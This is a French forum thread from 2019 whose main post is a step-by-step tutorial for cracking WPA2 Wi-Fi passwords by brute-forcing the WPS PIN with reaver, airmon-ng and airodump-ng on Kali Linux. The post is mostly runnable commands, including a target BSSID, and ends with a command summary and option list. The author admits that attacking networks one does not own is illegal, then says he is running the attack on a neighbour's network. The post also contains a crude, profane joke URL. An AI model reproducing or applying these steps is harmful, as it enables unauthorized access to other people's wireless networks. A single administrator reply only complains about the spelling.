Auteur Sujet: tutoriel reaver cracker une reéseaux avec wps  (Lu 1648 fois)

Hors ligne rezohs21

• Membre régulier
  • **
  • +2/-0
tutoriel reaver cracker une reéseaux avec wps
« le: 05 mai 2019 à 16:39:34 »
tutoriel cracker un clef wep/wpa wpa2 avec jean jacques reaver

bonjour ,cher public dans ce tutoriel nous allons voir comment cracker un wpa2 avec reaver  avec le standard de sécurité wps

Cette attaque est de type brute force et ne marche uniquement que si le point d'accès wifi a le dispositif de sécurité WPS d'activé.

tenter de trouver un clef reseaux(mot de passe) d'un reseaux qui vous appartient pas est illegal cest pourqoi aujourdhui nous allons le tester sur un des reseaux avoisinant vu que mon wps est désactivé

wpa2 (wi-fi protected access 2 )est un mécanisme qui sert a sécurisé les reseaux sans-fil wi-fitte mdr
il a été créer au début des années 2000 a cause des faiblesse trouver dans le wep (protocole de sécurité réseaux)

wap (numero 1)il a été concu pour remplacer wep

pour defoncer une wap2 il faut au prealable avoir reaver dinstaller a vous de chercher comment car jai kali linux et il viens avec dans attaque de mot de passe sans fil (dans applications) par défaut

ensuite il vous faut un point d'accès sans fil et une carte réseaux sans fil qui sert a injecter des paquets il vous en faut absolument une sinon sa va pas fonctionner regarder en ligne aircrack-ng tutorial si vous me croyez pas il des information sur le site de aircrack-ng.org qui vous dise que vous etes obliger davoir un carte reseau sans-fil.

pour savoir si vous carte reseaux supporte le mode moniteur taper

airmon-ng dans un terminal et si sa vous sort quelque chose comme moi votre carte est compatible ! fiou pas besoin den acheter une !

télécharger aircrack-ng si vous voulez avoir acces a la commande airmon-ng

airmon-ng

PHY   Interface   Driver      Chipset

phy0   wlan0mon   iwlwifi      Intel Corporation Centrino Wireless-N 105 (rev c4)

trop chanceux

votre carte reseau est peut etre sans fil et supporte le mode moniteur comme la mienne jai pas eu besoin den acheter ce qui est tres rare sinon acheter une carte reseaux sans fil sur ce site:

http://aircrack-ng.org/doku.php?id=faq#what_is_the_best_wireless_card_to_buy

sa vous dis quelque carte sont les meilleurs et quel acheter comme autre possibilité

acheter la alpha patente cest une bonne

pour commencer taper iwconfig qui sert a configurer des interfaces reseaux sans fil

ici nous allons voir notre carte reseaux sans fil sa sert a sa

ensuite retenez bien le nom de linterface de la  carte reseaux sans fil

moi ses wlan0

ensuite il faut mettre notre carte reseaux sans fil en mode moniteur
pour cela il faut avoir telecharger aircrack-ng qui viens par defaut sous kali li
cela sert a injecter des paquets notre carte va en injecter des paquets réseau

airmon-ng check kill |liste les programmes qui peuvent interferer avec la carte sans fil réseau si kill est spécifié sa les tue toutes mdr  donc vous taper sa en premier
vous pouvez taper juste airmon-ng check pour voir les propro qui interfere avec la carte réseau sans fil

airmon-ng start <interface_reseaux_de_votre_carte_dans_iwconfig> 
airmon-ng start wlan0  mettre la carte en mode moniteur(vous deconnecte du reseau)
 si vous voulez arreter et retrouver votre connexion internet en tout temps taper:
 airmon-ng stop <nom_interface_dans_iwconfig> ( ce pas ecrit sa sur les tutos anglophobes)
retaper iwconfig car le nom va avoir changer sa sera plus wlan0 sa va etre wlan0mon mon pour moniteur

trouver le bssid le mac adresse du point dacces reseaux

maintenant taper airodump-ng <votre interface>
airodump-ng wlan0mon
pour voir les reseaux disponible autours

ensuite chercher le bssis la mac adresse  de lap et sous la colonne enc (encryption) (cryptage) tamamanlagrosseputain.ca/cracking/reseaux/raircrack-ng_wpe_tutoriel

quand vous voyez un reseau disponible
fait control c pour arreter le propro pour pouvoir copier coller les informations necessaire

ENSUITE

reaver -i <interface dans iwconfig>  -b bssid -vv

cela demande a reaver desseyer des "pins" sur le routeur  dans un attaque "brute force" un apres lautre

reaver -i wlan0mon -b  62:01:94:5A:9E:86 -vv

ensuite apres avoir trouver le code
airmon-ng stop <inteface_dans_iwconfig>  pour arreter le mode moniteur 

et taper service network-manager restart et
service networking restart

------------------------------------------------------------------------------------------
notes personnelles: ou résumé plutot
iwconfig
airmon-ng check
airmon-ng check kill
airmon-ng  start wlan0
airodump-ng wlan0mon ctrl-c
reaver -i wlan0mon -b  62:01:94:5A:9E:86 -vv
airmon-ng stop <inteface_dans_iwconfig> pour arreter le mode moniteur
et taper service network-manager restart et
service networking restart
service network-manager restart

options reaver utile
-i, --interface interface en mode moniteur a utiliser
-b --bssid le bssid
-m --mac le mac du system hote(nous)
-e --essid le essid(nom reseau)
-c --channel la canal
--pin= si vous savez deja le pin mdr
-v ou -vv ou --verbose(=-v) 2 pour plus dinformations affiche les avertissements non-critiques genre des informations qui sont pas grave genre a on a trouver la clé du reseaux mdr

Hors ligne ZeR0-@bSoLu

• Administrateur
  • Membre Elite
  • +138/-4
  • Pentest - Arch - Python - Kali
    • Kali-fr
Re : tutoriel reaver cracker une reéseaux avec wps
« Réponse #1 le: 06 mai 2019 à 09:13:54 »
Trop de fautes et illisible encore :/ applique toi !
Mess  with the bests.
Die like the rest.